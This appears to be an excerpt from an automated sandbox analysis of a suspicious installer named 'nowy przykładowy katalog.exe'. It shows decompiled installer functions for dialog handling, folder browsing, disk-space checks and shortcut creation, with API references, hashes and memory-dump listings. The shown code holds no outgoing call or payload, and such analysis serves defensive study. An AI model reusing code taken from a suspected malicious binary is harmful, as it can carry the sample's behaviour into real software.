                                                  0x0040525d
                                                  0x00405260
                                                  0x00000000
                                                  0x00000000
                                                  0x0040526a
                                                  0x00405270
                                                  0x00405272
                                                  0x00405275
                                                  0x0040536e
                                                  0x00000000
                                                  0x0040536e
                                                  0x00405284
                                                  0x00405290
                                                  0x00405296
                                                  0x00405299
                                                  0x0040529c
                                                  0x004052b1
                                                  0x004052b4
                                                  0x004052b4
                                                  0x004052b7
                                                  0x0040529e
                                                  0x004052a3
                                                  0x004052a9
                                                  0x004052ac
                                                  0x004052ac
                                                  0x004052c7
                                                  0x004052cf
                                                  0x004052d0
                                                  0x004052d2
                                                  0x004052db
                                                  0x004052de
                                                  0x004052e5
                                                  0x004052ec
                                                  0x004052f4
                                                  0x004052f4
                                                  0x00405302
                                                  0x00405308
                                                  0x0040530b
                                                  0x0040530b
                                                  0x00405312
                                                  0x00405318
                                                  0x00405321
                                                  0x00405328
                                                  0x00405331
                                                  0x00405333
                                                  0x00405336
                                                  0x00405345
                                                  0x00405347
                                                  0x0040534d
                                                  0x0040534e
                                                  0x0040534f
                                                  0x0040534f
                                                  0x00405357
                                                  0x00405362
                                                  0x00405368
                                                  0x00405368
                                                  0x00000000
                                                  0x004052d2
                                                  0x00405202
                                                  0x00405208
                                                  0x00405238
                                                  0x0040523a
                                                  0x00405240
                                                  0x0040524b
                                                  0x0040524b
                                                  0x00405252
                                                  0x00000000
                                                  0x00405252
                                                  0x0040520c
                                                  0x00405216
                                                  0x00000000
                                                  0x004051dd
                                                  0x004051dd
                                                  0x004051e3
                                                  0x0040521b
                                                  0x00000000
                                                  0x00405224
                                                  0x004051ec
                                                  0x004051f1
                                                  0x004051f4
                                                  0x00000000
                                                  0x004051f4
                                                  0x004051db
                                                  0x00405012
                                                  0x00405016
                                                  0x0040501f
                                                  0x00405026
                                                  0x00405029
                                                  0x0040502c
                                                  0x0040502f
                                                  0x00405030
                                                  0x00405031
                                                  0x0040504a
                                                  0x0040504d
                                                  0x00405057
                                                  0x00405066
                                                  0x0040506e
                                                  0x00405076
                                                  0x0040507b
                                                  0x0040507e
                                                  0x0040508a
                                                  0x00405093
                                                  0x0040509c
                                                  0x004050bf
                                                  0x004050c5
                                                  0x004050d6
                                                  0x004050db
                                                  0x004050e9
                                                  0x004050f7
                                                  0x004050f7
                                                  0x004050fc
                                                  0x0040510a
                                                  0x0040510a
                                                  0x0040510f
                                                  0x00405112
                                                  0x00405117
                                                  0x00405123
                                                  0x0040512c
                                                  0x00405139
                                                  0x00405148
                                                  0x0040513b
                                                  0x00405140
                                                  0x00405140
                                                  0x00405154
                                                  0x00405154
                                                  0x00405168
                                                  0x00405171
                                                  0x0040517a
                                                  0x0040518a
                                                  0x00405196
                                                  0x00405196
                                                  0x00000000

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00405050
                                                  • GetDlgItem.USER32 ref: 0040505F
                                                  • GetClientRect.USER32 ref: 0040509C
                                                  • GetSystemMetrics.USER32 ref: 004050A4
                                                  • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004050C5
                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050D6
                                                  • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050E9
                                                  • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050F7
                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040510A
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040512C
                                                  • ShowWindow.USER32(?,00000008), ref: 00405140
                                                  • GetDlgItem.USER32 ref: 00405161
                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405171
                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040518A
                                                  • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405196
                                                  • GetDlgItem.USER32 ref: 0040506E
                                                    • Part of subcall function 00403EB8: SendMessageA.USER32(00000028,?,00000001,00403CE9), ref: 00403EC6
                                                  • GetDlgItem.USER32 ref: 004051B3
                                                  • CreateThread.KERNEL32 ref: 004051C1
                                                  • CloseHandle.KERNEL32(00000000), ref: 004051C8
                                                  • ShowWindow.USER32(00000000), ref: 004051EC
                                                  • ShowWindow.USER32(00000000,00000008), ref: 004051F1
                                                  • ShowWindow.USER32(00000008), ref: 00405238
                                                  • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 0040526A
                                                  • CreatePopupMenu.USER32 ref: 0040527B
                                                  • AppendMenuA.USER32 ref: 00405290
                                                  • GetWindowRect.USER32 ref: 004052A3
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405302
                                                  • OpenClipboard.USER32(00000000), ref: 00405312
                                                  • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405318
                                                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
                                                  • GlobalLock.KERNEL32 ref: 0040532B
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040533F
                                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
                                                  • SetClipboardData.USER32 ref: 00405362
                                                  • CloseClipboard.USER32 ref: 00405368
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: Xy${
                                                  • API String ID: 590372296-2060763830
                                                  • Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                  • Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
                                                  • Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                  • Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10002F80, Relevance: 33.5, APIs: 10, Strings: 9, Instructions: 219stringfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Find$DocumentationFileProperty@16Themelstrcpy$CloseFirstNextlstrcatlstrlenwsprintf
                                                  • String ID: %s%s\%s.msstyles$(%s,%p,%p)$*.*$\$callback ended enum$callback(%s,%s,%s,%p)$displayname$searching %s$tooltip
                                                  • API String ID: 1093529425-3477817093
                                                  • Opcode ID: 75856c09a81ac6fab3befac2db50ced1be7b1cd96edcb0a82833ad9516c0886d
                                                  • Instruction ID: 514d53d8cc4ac7ab734e02283ca8a6bcbef22cfd117cd8304a169832f85f3fc2
                                                  • Opcode Fuzzy Hash: 75856c09a81ac6fab3befac2db50ced1be7b1cd96edcb0a82833ad9516c0886d
                                                  • Instruction Fuzzy Hash: 83B1A5B4D087288FDB55DF24C98479DBBF4EB48340F4089AEE88D93251DB74AA84CF52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004042C1, Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 273stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E004042C1(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x429870;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040546C(0x3fb, _t146);
					E00405E29(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040546C(0x3fb, _t146);
							if(E0040579B(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405BC7(0x429068, _t146);
							_t87 = E00405F57(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405BC7(0x429068, _t146);
								_t89 = E0040574E(0x429068);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429068,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429068) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429068,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E00405701(0x429068) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429068) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404755(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42e3fc; // 0x7a3d7a
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040473D(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429058);
									} else {
										E00404678(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42ecc4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403EA5(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a08c == _t158) {
									E00404256();
								}
								 *0x42a08c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a0a0;
							_v60 = E00404612;
							_v56 = _t146;
							_v68 = E00405BE9(_t146, 0x42a0a0, _t166, 0x429470, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004056BA(_t146);
								_t124 =  *0x42ec30; // 0x79ee58
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
									E00405BE9(_t146, 0x42a0a0, _t166, 0, _t125);
									if(lstrcmpiA(0x42dbc0, 0x42a0a0) != 0) {
										lstrcatA(_t146, 0x42dbc0);
									}
								}
								 *0x42a08c =  *0x42a08c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405727(_t146) != 0 && E0040574E(_t146) == 0) {
						E004056BA(_t146);
					}
					 *0x42e3f8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E83(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E83(_t166);
					E00403EB8(_t165);
					_t138 = E00405F57(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EEA(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                  0x004042c1
                                                  0x004042c7
                                                  0x004042cd
                                                  0x004042da
                                                  0x004042e8
                                                  0x004042eb
                                                  0x004042f3
                                                  0x004042f9
                                                  0x004042f9
                                                  0x00404305
                                                  0x00404308
                                                  0x00404376
                                                  0x0040437d
                                                  0x00404454
                                                  0x0040445b
                                                  0x0040446a
                                                  0x0040446a
                                                  0x0040446e
                                                  0x00404478
                                                  0x00404485
                                                  0x00404487
                                                  0x00404487
                                                  0x00404495
                                                  0x0040449c
                                                  0x004044a3
                                                  0x004044a6
                                                  0x004044dd
                                                  0x004044df
                                                  0x004044e5
                                                  0x004044ea
                                                  0x004044ee
                                                  0x004044f0
                                                  0x004044f0
                                                  0x0040450c
                                                  0x00000000
                                                  0x0040450e
                                                  0x00404511
                                                  0x0040451f
                                                  0x00404525
                                                  0x00404526
                                                  0x00404529
                                                  0x0040452c
                                                  0x00000000
                                                  0x0040452c
                                                  0x004044a8
                                                  0x004044aa
                                                  0x004044ae
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004044b0
                                                  0x004044b0
                                                  0x004044bd
                                                  0x004044c2
                                                  0x00000000
                                                  0x00000000
                                                  0x004044c6
                                                  0x004044c8
                                                  0x004044c8
                                                  0x004044d3
                                                  0x004044d6
                                                  0x004044db
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004044db
                                                  0x00404538
                                                  0x00404542
                                                  0x00404545
                                                  0x00404548
                                                  0x0040454f
                                                  0x0040454f
                                                  0x00404551
                                                  0x00404551
                                                  0x00404556
                                                  0x00404558
                                                  0x00404560
                                                  0x00404567
                                                  0x00404569
                                                  0x00404574
                                                  0x00404574
                                                  0x00404569
                                                  0x0040457b
                                                  0x00404584
                                                  0x0040458e
                                                  0x00404596
                                                  0x004045b1
                                                  0x00404598
                                                  0x004045a1
                                                  0x004045a1
                                                  0x00404596
                                                  0x004045b6
                                                  0x004045bb
                                                  0x004045c0
                                                  0x004045c9
                                                  0x004045c9
                                                  0x004045d2
                                                  0x004045d4
                                                  0x004045d4
                                                  0x004045e0
                                                  0x004045e8
                                                  0x004045f2
                                                  0x004045f2
                                                  0x004045f7
                                                  0x00000000
                                                  0x004045f7
                                                  0x004044a6
                                                  0x0040445d
                                                  0x00404464
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404464
                                                  0x00404383
                                                  0x0040438c
                                                  0x004043a6
                                                  0x004043ab
                                                  0x004043b5
                                                  0x004043bc
                                                  0x004043c8
                                                  0x004043cb
                                                  0x004043ce
                                                  0x004043d5
                                                  0x004043dd
                                                  0x004043e0
                                                  0x004043e4
                                                  0x004043eb
                                                  0x004043f3
                                                  0x0040444d
                                                  0x004043f5
                                                  0x004043f6
                                                  0x004043fd
                                                  0x00404402
                                                  0x00404407
                                                  0x0040440f
                                                  0x0040441c
                                                  0x00404430
                                                  0x00404434
                                                  0x00404434
                                                  0x00404430
                                                  0x00404439
                                                  0x00404446
                                                  0x00404446
                                                  0x004043f3
                                                  0x00000000
                                                  0x004043ab
                                                  0x00404399
                                                  0x00000000
                                                  0x00000000
                                                  0x0040439f
                                                  0x00000000
                                                  0x0040430a
                                                  0x00404317
                                                  0x00404320
                                                  0x0040432d
                                                  0x0040432d
                                                  0x00404334
                                                  0x0040433a
                                                  0x00404343
                                                  0x00404346
                                                  0x00404349
                                                  0x00404351
                                                  0x00404354
                                                  0x00404357
                                                  0x0040435d
                                                  0x00404364
                                                  0x0040436b
                                                  0x004045fd
                                                  0x0040460f
                                                  0x00404371
                                                  0x00404374
                                                  0x00000000
                                                  0x00404374
                                                  0x0040436b

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00404310
                                                  • SetWindowTextA.USER32(00000000,?), ref: 0040433A
                                                  • SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
                                                  • CoTaskMemFree.OLE32(00000000), ref: 004043F6
                                                  • lstrcmpiA.KERNEL32(rtrystwqtc,0042A0A0,00000000,?,?), ref: 00404428
                                                  • lstrcatA.KERNEL32(?,rtrystwqtc), ref: 00404434
                                                  • SetDlgItemTextA.USER32 ref: 00404446
                                                    • Part of subcall function 0040546C: GetDlgItemTextA.USER32 ref: 0040547F
                                                    • Part of subcall function 00405E29: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                    • Part of subcall function 00405E29: CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                    • Part of subcall function 00405E29: CharNextA.USER32(?,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                    • Part of subcall function 00405E29: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                  • GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040451F
                                                    • Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                    • Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
                                                    • Part of subcall function 00404678: SetDlgItemTextA.USER32 ref: 00404731
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\AppData\Local\Temp$Xy$rtrystwqtc$z=z
                                                  • API String ID: 2624150263-1990542941
                                                  • Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                  • Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
                                                  • Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                  • Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E00405727(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407504, _t75, 1, 0x4074f4, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407514, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\engineer\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409438, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409438, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                  0x0040205c
                                                  0x00402066
                                                  0x0040206f
                                                  0x00402079
                                                  0x00402082
                                                  0x0040208c
                                                  0x00402090
                                                  0x00402090
                                                  0x00402095
                                                  0x004020a6
                                                  0x004020ae
                                                  0x0040218e
                                                  0x0040218e
                                                  0x00402195
                                                  0x004020b4
                                                  0x004020b4
                                                  0x004020c5
                                                  0x004020c9
                                                  0x004020cf
                                                  0x004020d9
                                                  0x004020db
                                                  0x004020e6
                                                  0x004020e9
                                                  0x004020f6
                                                  0x004020f8
                                                  0x004020fa
                                                  0x00402101
                                                  0x00402104
                                                  0x00402104
                                                  0x00402107
                                                  0x00402111
                                                  0x00402119
                                                  0x0040211e
                                                  0x0040212a
                                                  0x0040212a
                                                  0x0040212d
                                                  0x00402136
                                                  0x00402139
                                                  0x00402142
                                                  0x00402147
                                                  0x00402159
                                                  0x00402168
                                                  0x0040216a
                                                  0x00402176
                                                  0x00402176
                                                  0x00402168
                                                  0x00402178
                                                  0x0040217e
                                                  0x0040217e
                                                  0x00402181
                                                  0x00402187
                                                  0x0040218c
                                                  0x004021a1
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040218c
                                                  0x00402197
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 123533781-1104044542
                                                  • Opcode ID: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                                  • Instruction ID: 8f67ba42191d57eba63015a6e8d0bffc44353c0eb35145c2afa1481ff4163fd5
                                                  • Opcode Fuzzy Hash: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                                  • Instruction Fuzzy Hash: 2D414C75A00205BFCB00DFA8CD89E9E7BB6EF49354F204169FA05EB2D1CA799C41CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 100057F4, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E100057F4(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                                  0x100057f9
                                                  0x10005809

                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,10006BFE,?,?,?,00000000), ref: 100057F9
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 10005802
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 7a186e50e94c68366ece4b0a4fa88182fe4990e1dae7649d273436561e684ccc
                                                  • Instruction ID: d2295511bf7f6119e441c0d4ef02c9b13b0a507d50578b67acd8ddff33285d7a
                                                  • Opcode Fuzzy Hash: 7a186e50e94c68366ece4b0a4fa88182fe4990e1dae7649d273436561e684ccc
